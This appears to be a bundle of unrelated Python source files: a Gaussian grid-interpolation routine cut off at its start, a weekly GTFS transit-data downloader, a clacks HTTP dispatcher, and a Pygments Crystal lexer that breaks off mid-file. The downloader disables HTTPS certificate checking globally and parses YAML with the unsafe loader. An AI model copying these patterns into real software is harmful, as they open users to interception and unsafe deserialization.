'''Gaussian interpolate in lat, lon, and time to a different lat/lon grid, and over a time window to the center time.
Bundle of arrays (var) contains a 3D masked variable and coordinate arrays for lat, lon, and time read from netdf/hdf files.
Returns the 2D interpolated variable (masked) and a status for failures.
'''
v = var[varNames[0]][:]
vmask = np.ma.getmask(v)[:]
vtime = var[varNames[1]][:]
lat = var[varNames[2]][:]
lon = var[varNames[3]][:]
vinterp, vweight, status = \
gaussInterp_(v, vmask, vtime, lat, lon,
outlat, outlon, wlat, wlon, slat, slon, stime, vfactor, missingValue)
vinterp = np.ma.masked_where(vweight == 0.0, vinterp)
return (vinterp, vweight, status)
#@jit(nopython=False)
def gaussInterp_(var, # variable & mask arrays with dimensions of time, lon, lat
vmask,
vtime, # coordinate vectors for inputs
lat,
lon,
outlat, # coordinate vectors for grid to interpolate to
outlon,
wlat, wlon, # window of lat/lon neighbors to gaussian weight, expressed in delta lat (degrees)
slat, slon, stime, # sigma for gaussian downweighting with distance in lat, lon (deg), & time (days)
vfactor, # factor in front of gaussian expression
missingValue): # value to mark missing values in interp result
'''Gaussian interpolate in lat, lon, and time to a different lat/lon grid, and over a time window to the center time.
Returns the 2D interpolated variable (masked), the weight array, and a status for failures.
'''
vinterp = np.zeros( (outlat.shape[0], outlon.shape[0]), dtype=var.dtype ) # interpolated variable, missing values not counted
vweight = np.zeros( (outlat.shape[0], outlon.shape[0]), dtype=var.dtype ) # weight of values interpolated (can be zero)
status = 0 # negative status indicates error
ntime = vtime.shape[0]
nlat = lat.shape[0]
nlon = lon.shape[0]
noutlat = outlat.shape[0]
noutlon = outlon.shape[0]
midTime = vtime[int(ntime/2 + 0.5)]
wlat2 = wlat / 2.
wlon2 = wlon / 2.
lat0 = lat[0]
lon0 = lon[0]
dlat = lat[1] - lat[0]
dlon = lon[1] - lon[0]
for i in xrange(noutlat):
print >>sys.stderr, outlat[i]
for j in xrange(noutlon):
if VERBOSE: print >>sys.stderr, '\n(i,j) = %d, %d' % (i, j)
if VERBOSE: print >>sys.stderr, '\n(outlat,outlon) = %f, %f' % (outlat[i], outlon[j])
imin = clamp(int((outlat[i] - wlat2 - lat0)/dlat + 0.5), 0, nlat-1)
imax = clamp(int((outlat[i] + wlat2 - lat0)/dlat + 0.5), 0, nlat-1)
if imin > imax: (imin, imax) = (imax, imin) # input latitudes could be descending
if VERBOSE: print >>sys.stderr, '(imin, imax) = %d, %d' % (imin, imax)
if VERBOSE: print >>sys.stderr, '(minlat, maxlat) = %f, %f' % (lat[imin], lat[imax])
jmin = clamp(int((outlon[j] - wlon2 - lon0)/dlon + 0.5), 0, nlon-1)
jmax = clamp(int((outlon[j] + wlon2 - lon0)/dlon + 0.5), 0, nlon-1)
if VERBOSE: print >>sys.stderr, '(jmin, jmax) = %d, %d' % (jmin, jmax)
if VERBOSE: print >>sys.stderr, '(minlon, maxlon) = %f, %f' % (lon[jmin], lon[jmax])
# stencil = np.zeros( (ntime, imax-imin+1, jmax-jmin+1) )
for kin in xrange(ntime):
for iin in xrange(imin, imax+1):
for jin in xrange(jmin, jmax+1):
if not vmask[kin,iin,jin]:
fac = exp( vfactor *
(((outlat[i] - lat[iin])/slat)**2
+ ((outlon[j] - lon[jin])/slon)**2
+ ((midTime - vtime[kin])/stime)**2))
# stencil[kin, iin-imin, jin-jmin] = fac
val = var[kin, iin, jin]
if VERBOSE > 1: print >>sys.stderr, kin, iin, jin, vtime[kin], lat[iin], lon[jin], val, fac, val*fac
vinterp[i,j] = vinterp[i,j] + val * fac
vweight[i,j] = vweight[i,j] + fac
if vweight[i,j] != 0.0:
vinterp[i,j] = vinterp[i,j] / vweight[i,j]
# if VERBOSE > 1: print >>sys.stderr, 'stencil:\n', stencil
# if VERBOSE: print >>sys.stderr, 'stencil max:\n', np.max(np.max(stencil))
# if VERBOSE: print >>sys.stderr, 'stencil min:\n', np.min(np.min(stencil))
else:
vinterp[i,j] = missingValue
return (vinterp, vweight, status)
#@jit( int32(int32,int32,int32), nopython=False)
def clamp(i, n, m):
if i < n: return n
if i > m: return m
return i
|
<gh_stars>10-100
"""
Manage downloading of GTFS files over multiple locations.
This file handles
- Reading in gtfs-sources.yaml that describes data sources
- Checking already-downloaded data
- Downloading data, if it is time to do so again
For running the weekly periodic download, use:
python pipeline/downloads.py scrape
"""
import calendar
import datetime
import os
import sys
from urllib.request import FancyURLopener
import yaml
import time
from os.path import join
from gtfspy import util
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
from settings import RAW_DATA_DIR_PARENT_DIR
# data layout:
#
# - $location is the standard location slug.
# - $date is the date, in YYYY-MM-DD format
# - $part is the partition-slug if data comes in several files.
# Is "main" if only one partition.
#
# The following are some of the currently defined output files (only
# the first is managed here, the rest in Makefile_data.
#
# scratch/rawgtfs/$location/$date/$zone/gtfs.zip
# scratch/proc/$location/$date/$zone-gtfs/
# scratch/proc/$location/$date/$zone.sqlite
# scratch/proc/$location/$date/$zone.stats
#os.chdir("../")
# To handle downloading once per week, we map all days to a "week
# number". A download is done only once per week, as seen by the week
# numbers. Week numbering starts at midnight Wednesday (UTC) and
# lasts one week.
WEEK_NUMBER_EPOCH = 1445990400 # Unixtime of 2015,10,28 00:00 UTC.
WEEK_NUMBER_INTERVAL = 3600*24*7 # One week in seconds
def week_number(dt):
"""Return normalized week number. Weeks since 2015-10-28 00:00 UTC (W).
This is the hashing function used to download data once per week.
Weeks start on Wednesdays. Dates are hashed using this, and we
download once per bucket.
"""
ut = calendar.timegm(dt.timetuple())
# seconds since 2015,10,28 00:00 UTC.
ut -= WEEK_NUMBER_EPOCH
weekn = ut // WEEK_NUMBER_INTERVAL
return int(weekn)
def week_date(week_number):
"""Inverse of week_number: given week number, return datetime of start.
Returns: datetime.datetime in UTC. """
ut = WEEK_NUMBER_EPOCH + (WEEK_NUMBER_INTERVAL * week_number)
return datetime.datetime.utcfromtimestamp(ut)
def week_number_now():
"""The current week number"""
dt = datetime.datetime.utcnow()
week_now = week_number(dt)
return week_now
class Location(object):
"""Location Manager - handles dealing with multiple locations.
"""
slug = None
name = None
#gtfs_urls = { }
def __init__(self, slug, data):
"""Set basic properties of the data structure"""
self.slug = slug
if data is None:
self.data = { }
elif isinstance(data, str):
self.data = dict(notes=data)
else:
self.data = data
self._parse_data(self.data)
def _parse_data(self, data):
"""Initial parsing of scraping data.
The data includes the different regions and URLs. It sets up
self.gtfs_urls[zone_name] to be the data for each zone, and if
there is only one zone without a name, it is named "main".
"""
self.name = data.get('name', self.slug)
gtfs = data.get('gtfs')
if isinstance(gtfs, str):
self.gtfs_urls = dict(main=data['gtfs'])
elif isinstance(gtfs, dict):
self.gtfs_urls = gtfs
elif gtfs is None:
self.gtfs_urls = { }
else:
raise ValueError("Unknown gtfs key format: %s"%(gtfs, ))
# A bunch of methods that return standard file paths.
# Directories related to raw GTFS.
@property
def rawdir(self):
"""Base dir for GTFS downloads"""
return join(RAW_DATA_DIR_PARENT_DIR, 'rawgtfs/%s/' % self.slug)
def rawdir_dt(self, dt):
"""Base directory for one date"""
return join(self.rawdir, dt.strftime('%Y-%m-%d'))
def rawdir_zone(self, dt, zone):
"""Base directory for one GTFS file"""
return join(self.rawdir, dt.strftime('%Y-%m-%d'), zone)
@property
def procdir(self):
return join(RAW_DATA_DIR_PARENT_DIR, 'proc/%s/' % self.slug)
def procdir_dt(self, dt):
"""Base directory for one date"""
return join(self.procdir, dt.strftime('%Y-%m-%d'))
def procdir_zone(self, dt, zone):
"""Base directory for one GTFS file"""
return join(self.procdir, dt.strftime('%Y-%m-%d'), zone)
def path_gtfsdir(self, dt, zone):
"""Directory for extracted GTFS files"""
return join(self.procdir_zone(dt, zone), 'gtfs')
def path_gtfszip(self, dt, zone):
return join(self.rawdir_zone(dt, zone), 'gtfs.zip')
# Functions Related to downloading and unpacking.
def daily_download(self):
"""Download all files, if not already there.
For each zone, see if there is already a download for this
week (as found by week_number), and if not, then do that
download.
"""
for zone, url in self.gtfs_urls.items():
week_now = week_number_now()
# Get most recent download
zone_dates = self.list_zone_dates()
if zone not in zone_dates:
week_lastdownload = float('-inf')
else:
week_lastdownload = week_number(zone_dates[zone][-1])
if week_now > week_lastdownload:
dt = datetime.datetime.utcnow()
#zipfile = self.path_gtfszip(dt, zone)
#if not os.path.exists(zip):
self.gtfs_download(url, dt, zone)
#self.gtfs_extract(dt, zone)
def gtfs_download(self, url, dt, zone):
"""Do downloading of one file."""
print("Downloading", self.slug, url, zone, dt)
# Use only standard library functions to avoid dependencies.
#furl = urllib.urlopen(url)
opener = FancyURLopener()
# We have to set up an authentication method on the opener if
# we will need to authenticate. This does HTTP BASIC only so
# far.
if 'authentication' in self.data:
auth_name = self.data['authentication']
auth = auth_data['sites'][auth_name]
# A callback method which performs the authentication.
# Return (user, pass) tuple.
opener.prompt_user_passwd = \
lambda host, realm: (auth['username'], auth['password'])
# URL parameters auth method
if 'url_suffix' in auth:
url = url + auth['url_suffix']
if "{API_KEY}" in url:
try:
auth_name = self.data['authentication']
except KeyError:
auth_name = self.name
auth = auth_data['sites'][auth_name]
url = url.format(API_KEY=auth['API_KEY'])
# Make GTFS path.
gtfs_path = self.path_gtfszip(dt, zone)
util.makedirs(os.path.dirname(gtfs_path))
# Open the URL.
print("**** Connecting to %s" % url)
# Open GTFS and relay data from web to file.
with util.create_file(gtfs_path) as tmp_gtfs_path:
opener.retrieve(url, tmp_gtfs_path)
self.test_corrupted_zip(gtfs_path)
# Done
#def gtfs_extract(self, dt, zone):
# # Get paths, make target directory.
# gtfs_zip = self.path_gtfszip(dt, zone)
# gtfs_dir = self.path_gtfsdir(dt, zone)
# util.makedirs(gtfs_dir)
# # Open zipfile, get file names.
# zip = zipfile.ZipFile(gtfs_zip, 'r')
# names = zip.namelist()
# # Exatract every name that matches a basic sanity check.
# # zipfile module is supposed to do this too, but we'll be safe
# # here.
# for name in names:
# assert '/' not in name
# assert '\\' not in name
# assert not name.startswith('.')
# zip.extract(name, gtfs_dir)
# zip.close()
def test_corrupted_zip(self, zip_path):
import zipfile
try:
zip_to_test = zipfile.ZipFile(zip_path)
warning = zip_to_test.testzip()
if warning is not None:
print("ERROR: zipfile created warning: " + str(warning))
else:
print("No warnings")
except:
print("ERROR: zipfile for " + self.name + " not created")
# Getting information about available files
def list_dates(self):
"""List all dates for which any files may have been downloaded."""
if not os.path.isdir(self.rawdir):
return [ ]
names = os.listdir(self.rawdir)
dates = [ ]
for name in sorted(names):
if os.path.isdir(join(self.rawdir, name)):
dates.append(datetime.datetime.strptime(name, '%Y-%m-%d'))
return sorted(dates)
def list_files(self, dt):
"""List all zones downloaded on a given date."""
path = self.rawdir_dt(dt)
files = sorted(os.listdir(path))
return files
def list_zone_dates(self):
"""Return a dict of zone->[dt1, dt2, ...]"""
data = { }
for dt in self.list_dates():
for zone in self.list_files(dt):
data.setdefault(zone, []).append(dt)
return data
def load_data(fname):
"""Load all YAML data and create objects"""
data = yaml.load(open(fname))
#print data
sites = data['sites']
locations = { }
for name, data in sites.items():
#if name not in ('test', 'test2'): continue
locations[name] = Location(name, data)
return locations
def main_status(locations):
"""Print a status report for downloads."""
for name, L in sorted(locations.items()):
dates = L.list_dates()
if len(dates) == 0:
print("No data for location: '" + name + "'")
else:
print(name + ":")
for dt in L.list_dates():
print(" ", dt.strftime("%Y-%m-%d"))
for dir_ in sorted(L.list_files(dt)):
print(" ", dir_)
if __name__ == "__main__":
# Credentials for sites that need it.
auth_data = yaml.load(open('credentials.yaml'))
cmd = sys.argv[1]
# Second argument is used if one wants to download a specific city or cities (list)
try:
cities = sys.argv[2]
except:
cities = None
locations = load_data('gtfs-sources.yaml')
if cmd == 'status':
main_status(locations)
elif cmd == 'test':
locations['test'].daily_download()
locations['test2'].daily_download()
elif cmd == 'scrape':
if not os.path.exists(join(RAW_DATA_DIR_PARENT_DIR, 'rawgtfs/')):
raise OSError(join(RAW_DATA_DIR_PARENT_DIR, 'rawgtfs/') + " is not available. Perhaps you should mount it?")
print(time.strftime("%Y-%m-%d %H:%M%S"))
for name, L in locations.items():
try:
if cities:
if name in cities:
L.daily_download()
print(name)
else:
L.daily_download()
print(name)
except Exception as e:
import traceback
print("import of " + name + " failed")
print('=' * 20)
traceback.print_exc()
print('=' * 20)
print("... done with all.")
|
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
"""
The *HTTPService* and the *HTTPDispatcher* are responsible for exposing
registered `WSGI <http://wsgi.org>`_ components to the world. While the
*HTTPService* is just providing the raw HTTP service, the *HTTPDispatcher*
is redirecting a path to a module.
-------
"""
import thread
import logging
import tornado.wsgi
import tornado.web
from tornado.ioloop import IOLoop
from tornado.httpserver import HTTPServer
from zope.interface import implements
from webob import exc #@UnresolvedImport
from clacks.common import Environment
from clacks.common.handler import IInterfaceHandler
from clacks.common.utils import N_
from clacks.common.error import ClacksErrorHandler as C
from clacks.agent.exceptions import HTTPException
C.register_codes(dict(
HTTP_PATH_ALREADY_REGISTERED=N_("'%(path)s' has already been registered")
))
class HTTPDispatcher(object):
"""
The *HTTPDispatcher* can be used to register WSGI applications
to a given path. It will inspect the path of an incoming request
and decides which registered application it gets.
Analyzing the path can be configured to detect a *subtree* match
or an *exact* match. If you need subtree matches, just add the
class variable ``http_subtree`` to the WSGI class and set it to
*True*.
"""
def __init__(self):
self.__app = {}
self.env = Environment.getInstance()
self.log = logging.getLogger(__name__)
def __call__(self, environ, start_response):
path = environ.get('PATH_INFO')
for app_path in sorted(self.__app, key=len, reverse=True):
app = self.__app[app_path]
if hasattr(app, "http_subtree") and path.startswith(app_path if app_path == "/" else app_path + "/"):
return app.__call__(environ, start_response)
elif path == app_path:
return app.__call__(environ, start_response)
# Nothing found
self.log.debug('no resource %s registered!' % path)
resp = exc.HTTPNotFound('no resource %s registered!' % path)
return resp(environ, start_response)
def register(self, path, app):
self.log.debug("registering %s on %s" % (app.__class__.__name__, path))
self.__app[path] = app
def unregister(self, path):
if path in self.__app:
self.log.debug("unregistering %s" % path)
del(self.__app[path])
class HTTPService(object):
"""
Class to serve HTTP fragments to the interested client. It makes
makes use of a couple of configuration flags provided by the clacks
configuration files ``[http]`` section:
============== =============
Key Description
============== =============
url AMQP URL to connect to the broker
id User name to connect with
key Password to connect with
command-worker Number of worker processes
============== =============
Example::
[http]
host = node1.intranet.gonicus.de
port = 8080
sslpemfile = /etc/clacks/host.pem
If you want to create a clacks agent module that is going to export
functionality (i.e. static content or some RPC functionality) you
can register such a component like this::
>>> from clacks.common.components import PluginRegistry
>>> class SomeTest(object):
... http_subtree = True
... path = '/test'
...
... def __init__(self):
... # Get http service instance
... self.__http = PluginRegistry.getInstance('HTTPService')
...
... # Register ourselves
... self.__http.register(self.path, self)
...
When *SomeTest* is instantiated, it will register itself to the *HTTPService* -
and will be served when the *HTTPService* starts up.
"""
implements(IInterfaceHandler)
_priority_ = 10
__register = {}
__register_ws = {}
__register_static = {}
def __init__(self):
env = Environment.getInstance()
self.log = logging.getLogger(__name__)
self.log.info("initializing HTTP service provider")
self.env = env
self.srv = None
self.ssl = None
self.app = None
self.host = None
self.scheme = None
self.port = None
def serve(self):
"""
Start HTTP service thread.
"""
self.app = HTTPDispatcher()
self.host = self.env.config.get('http.host', default="localhost")
self.port = self.env.config.get('http.port', default=8080)
self.ssl = self.env.config.get('http.ssl', default=None)
if self.ssl and self.ssl.lower() in ['true', 'yes', 'on']:
self.scheme = "https"
ssl_options = dict(
certfile=self.env.config.get('http.certfile', default=None),
keyfile=self.env.config.get('http.keyfile', default=None),
ca_certs=self.env.config.get('http.ca-certs', default=None))
else:
self.scheme = "http"
ssl_options = None
apps = []
# Make statics registerable
for pth, local_pth in self.__register_static.items():
apps.append((pth, tornado.web.StaticFileHandler, {"path": local_pth}))
# Make websockets available if registered
for pth, ws_app in self.__register_ws.items():
apps.append((pth, ws_app))
# Finally add the WSGI handler
wsgi_app = tornado.wsgi.WSGIContainer(self.app)
apps.append((r".*", tornado.web.FallbackHandler, dict(fallback=wsgi_app)))
application = tornado.web.Application(apps)
# Fetch server
self.srv = HTTPServer(application, ssl_options=ssl_options)
self.srv.listen(self.port, self.host)
thread.start_new_thread(IOLoop.instance().start, ())
self.log.info("now serving on %s://%s:%s" % (self.scheme, self.host, self.port))
# Register all possible instances that have shown
# interrest to be served
for path, obj in self.__register.items():
self.app.register(path, obj)
def stop(self):
"""
Stop HTTP service thread.
"""
self.log.debug("shutting down HTTP service provider")
IOLoop.instance().stop()
def register(self, path, app):
"""
Register the application *app* on path *path*.
================= ==========================
Parameter Description
================= ==========================
path Path part of an URL - i.e. '/rpc'
app WSGI application
================= ==========================
"""
if path in self.__register_static or path in self.__register_ws:
raise HTTPException(C.make_error("HTTP_PATH_ALREADY_REGISTERED", path=path))
self.__register[path] = app
def register_static(self, path, local_path):
"""
Register a static directory *local_path* in the web servers
*path*.
================= ==========================
Parameter Description
================= ==========================
path Path part of an URL - i.e. '/static'
local_path Local path to serve from - i.e. '/var/www'
================= ==========================
"""
if path in self.__register or path in self.__register_ws:
raise HTTPException(C.make_error("HTTP_PATH_ALREADY_REGISTERED", path=path))
self.__register_static[path] = local_path
def register_ws(self, path, app):
"""
Register the websocket application *app* on path *path*.
================= ==========================
Parameter Description
================= ==========================
path Path part of an URL - i.e. '/ws'
app WSGI application
================= ==========================
"""
if path in self.__register or path in self.__register_static:
raise HTTPException(C.make_error("HTTP_PATH_ALREADY_REGISTERED", path=path))
self.__register_ws[path] = app
|
<reponame>dreamflasher/client
# -*- coding: utf-8 -*-
"""
pygments.lexers.crystal
~~~~~~~~~~~~~~~~~~~~~~~
Lexer for Crystal.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import ExtendedRegexLexer, include, \
bygroups, default, LexerContext, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Error
__all__ = ['CrystalLexer']
line_re = re.compile('.*?\n')
CRYSTAL_OPERATORS = [
'!=', '!~', '!', '%', '&&', '&', '**', '*', '+', '-', '/', '<=>', '<<', '<=', '<',
'===', '==', '=~', '=', '>=', '>>', '>', '[]=', '[]?', '[]', '^', '||', '|', '~'
]
class CrystalLexer(ExtendedRegexLexer):
"""
For `Crystal <http://crystal-lang.org>`_ source code.
.. versionadded:: 2.2
"""
name = 'Crystal'
aliases = ['cr', 'crystal']
filenames = ['*.cr']
mimetypes = ['text/x-crystal']
flags = re.DOTALL | re.MULTILINE
def heredoc_callback(self, match, ctx):
# okay, this is the hardest part of parsing Crystal...
# match: 1 = <<-?, 2 = quote? 3 = name 4 = quote? 5 = rest of line
start = match.start(1)
yield start, Operator, match.group(1) # <<-?
yield match.start(2), String.Heredoc, match.group(2) # quote ", ', `
yield match.start(3), String.Delimiter, match.group(3) # heredoc name
yield match.start(4), String.Heredoc, match.group(4) # quote again
heredocstack = ctx.__dict__.setdefault('heredocstack', [])
outermost = not bool(heredocstack)
heredocstack.append((match.group(1) == '<<-', match.group(3)))
ctx.pos = match.start(5)
ctx.end = match.end(5)
# this may find other heredocs
for i, t, v in self.get_tokens_unprocessed(context=ctx):
yield i, t, v
ctx.pos = match.end()
if outermost:
# this is the outer heredoc again, now we can process them all
for tolerant, hdname in heredocstack:
lines = []
for match in line_re.finditer(ctx.text, ctx.pos):
if tolerant:
check = match.group().strip()
else:
check = match.group().rstrip()
if check == hdname:
for amatch in lines:
yield amatch.start(), String.Heredoc, amatch.group()
yield match.start(), String.Delimiter, match.group()
ctx.pos = match.end()
break
else:
lines.append(match)
else:
# end of heredoc not found -- error!
for amatch in lines:
yield amatch.start(), Error, amatch.group()
ctx.end = len(ctx.text)
del heredocstack[:]
def gen_crystalstrings_rules():
def intp_regex_callback(self, match, ctx):
yield match.start(1), String.Regex, match.group(1) # begin
nctx = LexerContext(match.group(3), 0, ['interpolated-regex'])
for i, t, v in self.get_tokens_unprocessed(context=nctx):
yield match.start(3)+i, t, v
yield match.start(4), String.Regex, match.group(4) # end[imsx]*
ctx.pos = match.end()
def intp_string_callback(self, match, ctx):
yield match.start(1), String.Other, match.group(1)
nctx = LexerContext(match.group(3), 0, ['interpolated-string'])
for i, t, v in self.get_tokens_unprocessed(context=nctx):
yield match.start(3)+i, t, v
yield match.start(4), String.Other, match.group(4) # end
ctx.pos = match.end()
states = {}
states['strings'] = [
(r'\:@{0,2}[a-zA-Z_]\w*[!?]?', String.Symbol),
(words(CRYSTAL_OPERATORS, prefix=r'\:@{0,2}'), String.Symbol),
(r":'(\\\\|\\'|[^'])*'", String.Symbol),
# This allows arbitrary text after '\ for simplicity
(r"'(\\\\|\\'|[^']|\\[^'\\]+)'", String.Char),
(r':"', String.Symbol, 'simple-sym'),
# Crystal doesn't have "symbol:"s but this simplifies function args
(r'([a-zA-Z_]\w*)(:)(?!:)', bygroups(String.Symbol, Punctuation)),
(r'"', String.Double, 'simple-string'),
(r'(?<!\.)`', String.Backtick, 'simple-backtick'),
]
# double-quoted string and symbol
for name, ttype, end in ('string', String.Double, '"'), \
('sym', String.Symbol, '"'), \
('backtick', String.Backtick, '`'):
states['simple-'+name] = [
include('string-escaped' if name == 'sym' else 'string-intp-escaped'),
(r'[^\\%s#]+' % end, ttype),
(r'[\\#]', ttype),
(end, ttype, '#pop'),
]
# braced quoted strings
for lbrace, rbrace, bracecc, name in \
('\\{', '\\}', '{}', 'cb'), \
('\\[', '\\]', '\\[\\]', 'sb'), \
('\\(', '\\)', '()', 'pa'), \
('<', '>', '<>', 'ab'):
states[name+'-intp-string'] = [
(r'\\[' + lbrace + ']', String.Other),
(lbrace, String.Other, '#push'),
(rbrace, String.Other, '#pop'),
include('string-intp-escaped'),
(r'[\\#' + bracecc + ']', String.Other),
(r'[^\\#' + bracecc + ']+', String.Other),
]
states['strings'].append((r'%' + lbrace, String.Other,
name+'-intp-string'))
states[name+'-string'] = [
(r'\\[\\' + bracecc + ']', String.Other),
(lbrace, String.Other, '#push'),
(rbrace, String.Other, '#pop'),
(r'[\\#' + bracecc + ']', String.Other),
(r'[^\\#' + bracecc + ']+', String.Other),
]
# http://crystal-lang.org/docs/syntax_and_semantics/literals/array.html
states['strings'].append((r'%[wi]' + lbrace, String.Other,
name+'-string'))
states[name+'-regex'] = [
(r'\\[\\' + bracecc + ']', String.Regex),
(lbrace, String.Regex, '#push'),
(rbrace + '[imsx]*', String.Regex, '#pop'),
include('string-intp'),
(r'[\\#' + bracecc + ']', String.Regex),
(r'[^\\#' + bracecc + ']+', String.Regex),
]
states['strings'].append((r'%r' + lbrace, String.Regex,
name+'-regex'))
# these must come after %<brace>!
states['strings'] += [
# %r regex
(r'(%r([\W_]))((?:\\\2|(?!\2).)*)(\2[imsx]*)',
intp_regex_callback),
# regular fancy strings with qsw
(r'(%[wi]([\W_]))((?:\\\2|(?!\2).)*)(\2)',
intp_string_callback),
# special forms of fancy strings after operators or
# in method calls with braces
(r'(?<=[-+/*%=<>&!^|~,(])(\s*)(%([\t ])(?:(?:\\\3|(?!\3).)*)\3)',
bygroups(Text, String.Other, None)),
# and because of fixed width lookbehinds the whole thing a
# second time for line startings...
(r'^(\s*)(%([\t ])(?:(?:\\\3|(?!\3).)*)\3)',
bygroups(Text, String.Other, None)),
# all regular fancy strings without qsw
(r'(%([\[{(<]))((?:\\\2|(?!\2).)*)(\2)',
intp_string_callback),
]
return states
tokens = {
'root': [
(r'#.*?$', Comment.Single),
# keywords
(words('''
abstract asm as begin break case do else elsif end ensure extend ifdef if
include instance_sizeof next of pointerof private protected rescue return
require sizeof super then typeof unless until when while with yield
'''.split(), suffix=r'\b'), Keyword),
(words(['true', 'false', 'nil'], suffix=r'\b'), Keyword.Constant),
# start of function, class and module names
(r'(module|lib)(\s+)([a-zA-Z_]\w*(?:::[a-zA-Z_]\w*)*)',
bygroups(Keyword, Text, Name.Namespace)),
(r'(def|fun|macro)(\s+)((?:[a-zA-Z_]\w*::)*)',
bygroups(Keyword, Text, Name.Namespace), 'funcname'),
(r'def(?=[*%&^`~+-/\[<>=])', Keyword, 'funcname'),
(r'(class|struct|union|type|alias|enum)(\s+)((?:[a-zA-Z_]\w*::)*)',
bygroups(Keyword, Text, Name.Namespace), 'classname'),
(r'(self|out|uninitialized)\b|(is_a|responds_to)\?', Keyword.Pseudo),
# macros
(words('''
debugger record pp assert_responds_to spawn parallel
getter setter property delegate def_hash def_equals def_equals_and_hash
forward_missing_to
'''.split(), suffix=r'\b'), Name.Builtin.Pseudo),
(r'getter[!?]|property[!?]|__(DIR|FILE|LINE)__\b', Name.Builtin.Pseudo),
# builtins
# http://crystal-lang.org/api/toplevel.html
(words('''
Object Value Struct Reference Proc Class Nil Symbol Enum Void
Bool Number Int Int8 Int16 Int32 Int64 UInt8 UInt16 UInt32 UInt64
Float Float32 Float64 Char String
Pointer Slice Range Exception Regex
Mutex StaticArray Array Hash Set Tuple Deque Box Process File
Dir Time Channel Concurrent Scheduler
abort at_exit caller delay exit fork future get_stack_top gets
lazy loop main p print printf puts
raise rand read_line sleep sprintf system with_color
'''.split(), prefix=r'(?<!\.)', suffix=r'\b'), Name.Builtin),
# normal heredocs
(r'(?<!\w)(<<-?)(["`\']?)([a-zA-Z_]\w*)(\2)(.*?\n)',
heredoc_callback),
# empty string heredocs
(r'(<<-?)("|\')()(\2)(.*?\n)', heredoc_callback),
(r'__END__', Comment.Preproc, 'end-part'),
# multiline regex (after keywords or assignments)
(r'(?:^|(?<=[=<>~!:])|'
r'(?<=(?:\s|;)when\s)|'
r'(?<=(?:\s|;)or\s)|'
r'(?<=(?:\s|;)and\s)|'
r'(?<=\.index\s)|'
r'(?<=\.scan\s)|'
r'(?<=\.sub\s)|'
r'(?<=\.sub!\s)|'
r'(?<=\.gsub\s)|'
r'(?<=\.gsub!\s)|'
r'(?<=\.match\s)|'
r'(?<=(?:\s|;)if\s)|'
r'(?<=(?:\s|;)elsif\s)|'
r'(?<=^when\s)|'
r'(?<=^index\s)|'
r'(?<=^scan\s)|'
r'(?<=^sub\s)|'
r'(?<=^gsub\s)|'
r'(?<=^sub!\s)|'
r'(?<=^gsub!\s)|'
r'(?<=^match\s)|'
r'(?<=^if\s)|'
r'(?<=^elsif\s)'
r')(\s*)(/)', bygroups(Text, String.Regex), 'multiline-regex'),
# multiline regex (in method calls or subscripts)
(r'(?<=\(|,|\[)/', String.Regex, 'multiline-regex'),
# multiline regex (this time the funny no whitespace rule)
(r'(\s+)(/)(?![\s=])', bygroups(Text, String.Regex),
'multiline-regex'),
# lex numbers and ignore following regular expressions which
# are division operators in fact (grrrr. i hate that. any
# better ideas?)
# since pygments 0.7 we also eat a "?" operator after numbers
# so that the char operator does not work. Chars are not allowed
# there so that you can use the ternary operator.
# stupid example:
# x>=0?n[x]:""
(r'(0o[0-7]+(?:_[0-7]+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
bygroups(Number.Oct, Text, Operator)),
(r'(0x[0-9A-Fa-f]+(?:_[0-9A-Fa-f]+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
bygroups(Number.Hex, Text, Operator)),
(r'(0b[01]+(?:_[01]+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
bygroups(Number.Bin, Text, Operator)),
# 3 separate expressions for floats because any of the 3 optional
# parts makes it a float
(r'((?:0(?![0-9])|[1-9][\d_]*)(?:\.\d[\d_]*)(?:e[+-]?[0-9]+)?'
r'(?:_?f[0-9]+)?)(\s*)([/?])?',
bygroups(Number.Float, Text, Operator)),
(r'((?:0(?![0-9])|[1-9][\d_]*)(?:\.\d[\d_]*)?(?:e[+-]?[0-9]+)'
r'(?:_?f[0-9]+)?)(\s*)([/?])?',
bygroups(Number.Float, Text, Operator)),
(r'((?:0(?![0-9])|[1-9][\d_]*)(?:\.\d[\d_]*)?(?:e[+-]?[0-9]+)?'
r'(?:_?f[0-9]+))(\s*)([/?])?',
bygroups(Number.Float, Text, Operator)),
(r'(0\b|[1-9][\d]*(?:_\d+)*(?:_?[iu][0-9]+)?)\b(\s*)([/?])?',
bygroups(Number.Integer, Text, Operator)),
# Names
(r'@@[a-zA-Z_]\w*', Name.Variable.Class),
(r'@[a-zA-Z_]\w*', Name.Variable.Instance),
(r'\$\w+', Name.Variable.Global),
(r'\$[!@&`\'+~=/\\,;.<>_*$?:"^-]', Name.Variable.Global),
(r'\$-[0adFiIlpvw]', Name.Variable.Global),
(r'::', Operator),
include('strings'),
# chars
(r'\?(\\[MC]-)*' # modifiers
r'(\\([\\befnrtv#"\']|x[a-fA-F0-9]{1,2}|[0-7]{1,3})|\S)'
r'(?!\w)',
String.Char),
(r'[A-Z][A-Z_]+\b', Name.Constant),
# macro expansion
(r'\{%', String.Interpol, 'in-macro-control'),
(r'\{\{', String.Interpol, 'in-macro-expr'),
# attributes
(r'(@\[)(\s*)([A-Z]\w*)',
bygroups(Operator, Text, Name.Decorator), 'in-attr'),
# this is needed because Crystal attributes can look
# like keywords (class) or like this: ` ?!?
(words(CRYSTAL_OPERATORS, prefix=r'(\.|::)'),
bygroups(Operator, Name.Operator)),
(r'(\.|::)([a-zA-Z_]\w*[!?]?|[*%&^`~+\-/\[<>=])',
bygroups(Operator, Name)),
# Names can end with [!?] unless it's "!="
(r'[a-zA-Z_]\w*(?:[!?](?!=))?', Name),
(r'(\[|\]\??|\*\*|<=>?|>=|<<?|>>?|=~|===|'
r'!~|&&?|\|\||\.{1,3})', Operator),
(r'[-+/*%=<>&!^|~]=?', Operator),
(r'[(){};,/?:\\]', Punctuation),
(r'\s+', Text)
],
'funcname': [
